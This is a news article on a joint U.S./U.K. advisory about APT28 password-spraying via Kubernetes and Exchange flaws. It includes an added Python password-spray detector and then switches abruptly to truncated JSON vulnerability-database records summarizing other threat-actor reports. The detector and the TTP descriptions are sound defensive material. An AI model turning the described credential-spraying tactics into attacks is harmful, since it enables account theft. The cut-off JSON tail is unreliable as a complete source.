U.S. and U.K. authorities are warning that the APT28 advanced persistent threat (APT) actor – a.k.a. Fancy Bear or Strontium, among other names – has been using a [Kubernetes](<https://threatpost.com/windows-containers-malware-targets-kubernetes/166692/>) cluster in a widespread campaign of brute-force password-spraying attacks against hundreds of government and private sector targets worldwide.
The joint alert ([PDF](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)) – posted on Thursday by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and the U.K.’s National Cyber Security Centre (NCSC) – attributes the campaign to the APT group, which has [long been suspected](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of having ties to the General Staff Main Intelligence Directorate (GRU) arm of Russia’s military intelligence.
The attacks have been under way since at least mid-2019 through early 2021 and are “almost certainly still ongoing,” according to the advisory.
The threat actor has targeted “a significant amount” of its activity at organizations using [Microsoft Office 365 cloud services](<https://threatpost.com/microsoft-office-365-attacks-google-firebase/163666/>), authorities warned.
The attackers are after the passwords of people who work at sensitive jobs in hundreds of organizations worldwide, including government and military agencies in the U.S. and Europe, defense contractors, think tanks, law firms, media outlets, universities and more.
![APT28 targets](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02101634/APT28-targets-e1625235408497.jpg>)
APT28 targets being bombarded by brute-force attacks. Source: CISA advisory.
Once the threat actors obtain valid credentials, they use them for initial access, persistence, privilege escalation and defense evasion, among other things. The actors use the passwords in conjunction with exploits of publicly known vulnerabilities, such as [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) – a vulnerability in the [control panel of Microsoft’s Exchange Server](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) – and [CVE-2020-17144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17144>), also found in Exchange Server. Both of these, and other vulnerabilities, can be used for remote code execution (RCE) and further access to target networks.
After APT28 gains remote access, it uses a slew of well-known tactics, techniques and procedures (TTPs) – including HTTP(S), IMAP(S), POP3 and [NTLM](<https://threatpost.com/microsoft-addresses-ntlm-bugs-that-facilitate-credential-relay-attacks/126752/>) (a suite of Microsoft security protocols used for authentication) – in addition to Kubernetes-powered password-spraying, in order to move laterally, evade defenses and sniff out more information from the target networks.
![TTPs used together](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/02103812/TTPs--e1625236705468.jpg>)
Example of several TTPs used together as part of this type of brute-force campaign. Source: CISA advisory.
Given how vastly different the target networks’ structures are, the actors use an equally diverse mix of TTPs. The alert included 21 samples of known TTPs. One example is the TTPs used to exploit public-facing apps: APT28 has been tracked using the two previously mentioned bugs to gain privileged RCE on vulnerable Microsoft Exchange servers, which in some cases happened after valid credentials were identified via password spray, given that exploitation of the vulnerabilities requires authentication as a valid user.
## How Kubernetes Fits In
Authorities said that to obfuscate its true origin and to provide “a degree of anonymity,” the Kubernetes cluster used in these attacks normally routes brute-force authentication attempts through Tor and commercial [VPN services](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>), including CactusVPN, IPVanish, NordVPN, ProtonVPN, Surfshark and WorldVPN. If they’re not using [Tor](<https://threatpost.com/unencrypted-mobile-traffic-tor-network-leaks-pii/149200/>) or a VPN, the actors are sometimes using nodes in the Kubernetes cluster.
Given the “scalable nature of the password spray capability,” specific indicators of compromise (IOCs) can be easily altered to bypass IOC-based mitigation, the advisory explained. Thus, while the advisory lists specific indicators, authorities also advised organizations to consider denying all inbound traffic from known Tor nodes and public VPN services to Exchange servers or portals that don’t normally see that kind of access.
## Mitigations
Beyond authorities’ suggestion to consider shutting off the spigot on Tor and VPN services where that makes sense, the advisory also listed a number of standard and not-so-standard mitigations, summed up in an executive summary:
“Network managers should adopt and expand usage of multi-factor authentication to help counter the effectiveness of this capability. Additional mitigations to ensure strong access controls include time-out and lock-out features, the mandatory use of strong passwords, implementation of a Zero Trust security model that uses additional attributes when determining access, and analytics to detect anomalous accesses.”
But one expert, Tom (TJ) Jermoluk, CEO and co-founder of Beyond Identity, raised a hairy eyeball at the notion that stronger passwords can do anything to protect against password spraying, particularly when it comes on top of a concerted effort to gather valid credentials.
“Russian GRU agents and other state actors like those involved in SolarWinds – and a range of financially motivated attackers (e.g., ransomware) – all use the same ‘password spraying’ brute force techniques,” he told Threatpost in an email on Friday. “Why? Because they are so effective. Unfortunately, a misunderstanding of this technique is leading to shockingly flawed advice like that given in the NSA advisory which, in part, recommends ‘mandating the use of stronger passwords.’”
He added, “The credential-gathering that preceded the password spraying campaign most certainly collected short and strong passwords. And the Russian Kubernetes cluster used in the attack was capable of spraying ‘strong passwords.’”
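The advisory's "analytics to detect anomalous accesses" and its lock-out advice pull in different directions for a spray: each account sees only a handful of failures, so a per-account lockout never fires, and the signal only appears when failures are counted per source across many accounts. The detector below, an added example that is not code from the advisory or from Threatpost, runs that per-source view over constructed authentication log lines (the line format, field names and thresholds are assumptions) and also reports any account the spraying source subsequently logged into, since the advisory notes that harvested credentials are reused for initial access.

```python
"""
Password-spray detection over authentication logs (added example; the log
format, field names and thresholds are hypothetical).

A spray tries one or a few passwords against many accounts, so each account
records only a handful of failures while one source records failures across
many distinct accounts. A per-account lockout counter therefore never fires;
the signal lives in the per-source aggregate.
"""
from collections import defaultdict
from datetime import datetime, timezone
import re

# Hypothetical log format; the field names are assumptions for this example.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAIL)$"
)

# Constructed sample lines (documentation IP ranges). 203.0.113.5 sprays six
# accounts once each and later logs into one of them; 198.51.100.7 is a single
# user mistyping their own password, which must not be flagged as a spray.
SAMPLE_LOG = """\
2021-06-15T10:00:01Z src=203.0.113.5 user=alice@example.org result=FAIL
2021-06-15T10:00:04Z src=203.0.113.5 user=bob@example.org result=FAIL
2021-06-15T10:00:07Z src=203.0.113.5 user=carol@example.org result=FAIL
2021-06-15T10:00:10Z src=203.0.113.5 user=dave@example.org result=FAIL
2021-06-15T10:00:13Z src=203.0.113.5 user=erin@example.org result=FAIL
2021-06-15T10:00:16Z src=203.0.113.5 user=frank@example.org result=FAIL
2021-06-15T10:30:02Z src=203.0.113.5 user=frank@example.org result=SUCCESS
2021-06-15T10:05:00Z src=198.51.100.7 user=grace@example.org result=FAIL
2021-06-15T10:05:09Z src=198.51.100.7 user=grace@example.org result=FAIL
2021-06-15T10:05:20Z src=198.51.100.7 user=grace@example.org result=FAIL
2021-06-15T10:05:31Z src=198.51.100.7 user=grace@example.org result=FAIL
2021-06-15T10:05:45Z src=198.51.100.7 user=grace@example.org result=SUCCESS
"""


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "src": m["src"], "user": m["user"].lower(), "result": m["result"]}


def detect_spray(lines, window_seconds=3600, min_accounts=5, lockout_threshold=5):
    """
    Group events per source and per tumbling time window. Flag a window in
    which one source failed against at least `min_accounts` distinct accounts
    while keeping every account below `lockout_threshold` failures, i.e. the
    pattern a lockout policy alone cannot see. Any flagged account that the
    same source then logged into successfully is listed as a probable
    compromised credential.
    """
    fails = defaultdict(lambda: defaultdict(int))  # (src, bucket) -> user -> count
    successes = defaultdict(set)                   # (src, bucket) -> users
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # skip malformed lines rather than abort the run
        key = (ev["src"], int(ev["ts"].timestamp()) // window_seconds)
        if ev["result"] == "FAIL":
            fails[key][ev["user"]] += 1
        else:
            successes[key].add(ev["user"])

    findings = []
    for (src, bucket), per_user in fails.items():
        max_per_account = max(per_user.values())
        if len(per_user) >= min_accounts and max_per_account < lockout_threshold:
            window_start = datetime.fromtimestamp(bucket * window_seconds, timezone.utc)
            findings.append({
                "src": src,
                "window_start": window_start.isoformat(),
                "accounts": len(per_user),
                "max_per_account": max_per_account,
                "success_accounts": sorted(successes[(src, bucket)] & set(per_user)),
            })
    return findings


if __name__ == "__main__":
    for finding in detect_spray(SAMPLE_LOG.splitlines()):
        print(finding)
```

Because the IOCs of a scalable spray change freely, the detector keys on behaviour rather than on source addresses; a source routed through Tor or a VPN still produces the same many-accounts, few-failures-each shape.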
## The Continuing Threat
On Friday, Russia’s embassy in Washington issued a statement on [Facebook](<https://www.facebook.com/RusEmbUSA>) in which it “categorically” rejected the allegations, noting that “We emphasize that fighting against cybercrime is an inherent priority for Russia and an integral part of its state policy to combat all forms of crime.”
Just a few of the recent campaigns attributed to Russia’s military unit:
**April 2021**: The [NSA linked APT29](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) to Russia’s Foreign Intelligence Services (SVR), as the U.S. formally attributed the recent [SolarWinds supply-chain attacks](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.
**November 2020**: Microsoft reported that APT28 joined in the feeding frenzy as one of three major APTs that [went after pharma](<https://threatpost.com/russia-north-korea-attacking-covid-19-vaccine-makers/161205/>) and clinical organizations involved in COVID-19 research.
**September 2020**: Microsoft issued a warning that members of the Russian military unit were attempting to [harvest Office 365](<https://threatpost.com/apt28-theft-office365-logins/159195/>) credentials in the run-up to U.S. elections, targeting mainly election-related organizations. The company noted at the time that the group had attacked more than 200 organizations last year, including political campaigns, advocacy groups, parties and political consultants. Those targets included think-tanks such as The German Marshall Fund of the United States, The European People’s Party, and various U.S.-based consultants serving Republicans and Democrats.
Saying that we can’t let down our guard would be quite the understatement, according to Check Point spokesperson Ekram Ahmed: “GRU continues to be a threat that we can’t ignore,” he observed to Threatpost on Friday. “The scale, reach and pace of their operations are alarming, especially with the 2021 Summer Olympics around the corner.”
In fact, in October 2020, the U.K.’s NCSC, in a joint operation with U.S. intelligence, said that that’s exactly what was in the works, accusing Russian military intelligence services of [planning a cyberattack](<https://www.theguardian.com/world/2020/oct/19/russia-planned-cyber-attack-on-tokyo-olympics-says-uk>) on the [Japanese-hosted Olympics](<https://www.sportingnews.com/au/other-sports/news/tokyo-olympic-games-2021-will-they-go-ahead/1gv928rhuuo0o1ucb6481onp4m>), scheduled to start in three weeks on July 23 after having been postponed due to the pandemic.
"AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-17144"], "modified": "2021-07-03T14:44:51", "id": "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "href": "https://thehackernews.com/2021/07/nsa-fbi-reveal-hacking-methods-used-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:33", "description": "State-sponsored actors backed by the Russian government regularly targeted the networks of several U.S. cleared defense contractors (CDCs) to acquire proprietary documents and other confidential information pertaining to the country's defense and intelligence programs and capabilities.\n\nThe sustained espionage campaign is said to have commenced at least two years ago from January 2020, according to a [joint advisory](<https://www.cisa.gov/news/2022/02/16/new-cybersecurity-advisory-protecting-cleared-defense-contractor-networks-against>) published by the U.S. Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA).\n\n\"These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>). \"The acquired information provides significant insight into U.S. 
weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology.\"\n\nCompromised entities include contractors that dabble in command, control, communications, and combat systems; surveillance and reconnaissance; weapons and missile development; vehicle and aircraft design; and software development, data analytics, and logistics.\n\nThe threat actors rely on \"common but effective\" tactics to breach target networks such as spear-phishing, credential harvesting, brute-force attacks, password spray techniques, and exploitation of known vulnerabilities in VPN devices, before moving laterally to establish persistence and exfiltrate data.\n\nSome of the [vulnerabilities](<https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html>) leveraged by the attackers for initial access and privilege escalation are as follows \u2013\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) \u2013 FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) \u2013 Microsoft Exchange validation key remote code execution vulnerability\n * [**CVE-2020-17144**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17144>) (CVSS score: 8.4) \u2013 Microsoft Exchange remote code execution vulnerability\n\nMany of the intrusions also involve gaining a foothold to enterprise and cloud networks, with the adversaries maintaining persistent access to the compromised Microsoft 365 environments for as long as six months to repeatedly harvest emails and data.\n\n\"As CDCs find and patch known vulnerabilities on 
their networks, the actors alter their tradecraft to seek new means of access,\" the agencies explained. \"This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\"\n\nAmong other malicious activities observed is the routine use of virtual private servers (VPSs) as an encrypted proxy and the use of legitimate credentials to exfiltrate emails from the victim's enterprise email system. The advisory, however, does not single out any Russian state actor by name.\n\n\"Over the last several years, Russian state-sponsored cyber actors have been persistent in targeting U.S. cleared defense contractors to get at sensitive information,\" [said](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2935170/nsa-fbi-cisa-release-advisory-on-protecting-cleared-defense-contractor-networks/>) Rob Joyce, director of NSA Cybersecurity. \"Armed with insights like these, we can better detect and defend important assets together.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T05:42:00", "type": "thn", "title": "U.S. 
Says Russian Hackers Stealing Sensitive Data from Defense Contractors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-17T13:01:50", "id": "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "href": "https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-12-26T12:10:08", "description": "An exhaustive analysis of **FIN7** has unmasked the cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.\n\nIt has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct ransomware [DarkSide](<https://thehackernews.com/2022/05/us-proposes-1-million-fine-on-colonial.html>), [REvil](<https://thehackernews.com/2022/05/new-revil-samples-indicate-ransomware.html>), and [LockBit](<https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html>) families.\n\nThe highly active threat group, also known as Carbanak, is [known](<https://thehackernews.com/2022/04/fin7-hackers-leveraging-password-reuse.html>) for employing an 
extensive arsenal of tools and tactics to expand its \"cybercrime horizons,\" including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing.\n\nMore than 8,147 victims have been compromised by the financially motivated adversary across the world, with a majority of the entities located in the U.S. Other prominent countries include China, Germany, Canada, Italy, and the U.K.\n\nFIN7's intrusion techniques, over the years, have further diversified beyond traditional social engineering to include infected USB drives, software supply chain compromise, and the use of stolen credentials purchased from underground markets.\n\n\"Nowadays, its initial approach is to carefully pick high-value companies from the pool of already compromised enterprise systems and force them to pay large ransoms to restore their data or seek unique ways to monetize the data and remote access,\" PRODAFT [said](<https://www.prodaft.com/resource/detail/fin7-unveiled-deep-dive-notorious-cybercrime-gang>) in a report shared with The Hacker News.\n\nAccording to the Swiss cybersecurity company, the Russian-speaking hacking crew has also been observed to weaponize several flaws in Microsoft Exchange such as [CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>), [CVE-2021-42321](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>), [ProxyLogon, and ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) to obtain a foothold into target environments.\n\nThe use of [double extortion 
tactics](<https://thehackernews.com/2022/12/cuba-ransomware-extorted-over-60.html>) notwithstanding, attacks mounted by the group have deployed SSH backdoors on the compromised systems, even in scenarios where the victim has already paid a ransom.\n\nThe idea is to resell access to other ransomware outfits and re-target the victims as part of its illicit money-making scheme, underscoring its attempts to minimize efforts and maximize profits, not to mention prioritize companies based on their annual revenues, founded dates, and the number of employees.\n\nThis \"demonstrates a particular type of feasibility study considered a unique behavior among cybercrime groups,\" the researchers said.\n\nPut differently, the modus operandi of FIN7 boils down to this: It utilizes services like Crunchbase, Dun & Bradstreet (DNB), Owler, and Zoominfo to shortlist firms and organizations with the highest revenue. 
It also uses other website analytics platforms like MuStat and Similarweb to monitor traffic to the victims' sites.\n\nInitial access is then obtained through one of the many intrusion vectors, followed by exfiltrating data, encrypting files, and eventually determining the ransom amount based on the company's revenue.\n\nThese infection sequences are also designed to load remote access trojans such as [Carbanak](<https://thehackernews.com/2021/06/fin7-supervisor-gets-7-year-jail-term.html>), [Lizar](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>) (aka Tirion), and [IceBot](<https://www.recordedfuture.com/fin7-flash-drives-spread-remote-access-trojan>), the latter of which was first documented by Recorded Future-owned Gemini Advisory in January 2022.\n\nOther tools developed and delivered by FIN7 encompass a module dubbed Checkmarks that's orchestrated to automate mass scans for vulnerable Microsoft Exchange servers and other public-facing web applications as well as [Cobalt Strike](<https://thehackernews.com/2022/11/google-identifies-34-cracked-versions.html>) for post-exploitation.\n\nIn yet another indication that criminal groups [function like traditional companies](<https://thehackernews.com/2022/04/researchers-share-in-depth-analysis-of.html>), FIN7 follows a team structure consisting of top-level management, developers, pentesters, affiliates, and marketing teams, each of whom are tasked with individual responsibilities.\n\nWhile two members named Alex and Rash are the chief players behind the operation, a third managerial member named Sergey-Oleg is responsible for delegating duties to the group's other associates and overseeing their execution.\n\nHowever, 
an examination of the group's Jabber conversation history has revealed that operators in administrator positions engage in coercion and blackmail to intimidate team members into working more and issue ultimatums to \"hurt their family members in case of resigning or escaping from responsibilities.\"\n\nThe findings come more than a month after cybersecurity company SentinelOne [identified](<https://thehackernews.com/2022/11/researchers-find-links-bw-black-basta.html>) potential links between FIN7 and the Black Basta ransomware operation.\n\n\"FIN7 has established itself as an extraordinarily versatile and well-known APT group that targets enterprise companies,\" PRODAFT concluded. \"Their signature move is to thoroughly research the companies based on their revenue, employee count, headquarters and website information to pinpoint the most profitable targets.\"\n\n\"Although they have internal issues related to the unequal distribution of obtained monetary resources and somewhat questionable practices towards their members, they have managed to establish a strong presence in the cybercrime sphere.\"\n
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T13:13:00", "type": "thn", "title": "FIN7 Cybercrime Syndicate Emerges as a Major Player in Ransomware Landscape", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2021-42321"], "modified": "2022-12-26T11:59:04", "id": "THN:CE51F3F4A94EFC268FD06200BF55BECD", "href": "https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:57", "description": "A new cyber espionage group named Gelsemium has been linked to a [supply chain attack targeting the NoxPlayer](<https://thehackernews.com/2021/02/a-new-software-supplychain-attack.html>) Android emulator that was disclosed earlier this 
year.\n\nThe findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename [Operation TooHash](<https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf>) based on malware payloads deployed in those intrusions.\n\n\"Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,\" cybersecurity firm ESET [said](<https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/>) in an analysis published last week.\n\n\"Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand.\"\n\nTargeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, Saudi Arabia, Syria, and Egypt.\n\nSince its origins in the mid-2010s, Gelsemium has been found employing a variety of malware delivery techniques ranging from spear-phishing documents exploiting Microsoft Office vulnerabilities ([CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>)) and watering holes to a remote code execution flaw in Microsoft Exchange Server \u2014 likely [CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>), which was addressed by the Windows maker in [June 2020](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) \u2014 to deploy the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell.\n\nAccording to ESET, Gelsemium's first stage is a C++ dropper named \"Gelsemine,\" which deploys a loader 
\"Gelsenicine\" onto the target system, which, in turn, retrieves and executes the main malware \"**Gelsevirine**\" that's capable of loading additional plug-ins provided by the command-and-control (C2) server.\n\nThe adversary is said to have been behind a supply chain attack aimed at BigNox's NoxPlayer, in a campaign dubbed \"**Operation NightScout**,\" in which the software's update mechanism was compromised to install backdoors such as **Gh0st RAT** and **PoisonIvy RAT** to spy on its victims, capture keystrokes, and gather valuable information.\n\n\"Victims originally compromised by that supply chain attack were later being compromised by Gelsemine,\" ESET researchers Thomas Dupuy and Matthieu Faou noted, with similarities observed between the trojanized versions of NoxPlayer and Gelsemium malware.\n\nWhat's more, another backdoor called **Chrommme**, which was detected on an unnamed organization's machine also compromised by the Gelsemium group, used the same C2 server as that of Gelsevirine, raising the possibility that the threat actor may be sharing the attack infrastructure across its malware toolset.\n\n\"The Gelsemium biome is very interesting: it shows few victims (according to our telemetry) with a vast number of adaptable components,\" the researchers concluded. \"The plug-in system shows that developers have deep C++ knowledge.\"\n
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T13:34:00", "type": "thn", "title": "NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2020-0688"], "modified": "2021-06-14T13:34:33", "id": "THN:9B536B531E6948881A29BEC793495D1E", "href": "https://thehackernews.com/2021/06/noxplayer-supply-chain-attack-is-likely.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), 
[ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal 
flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. 
Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:09", "description": "The US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried out by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. 
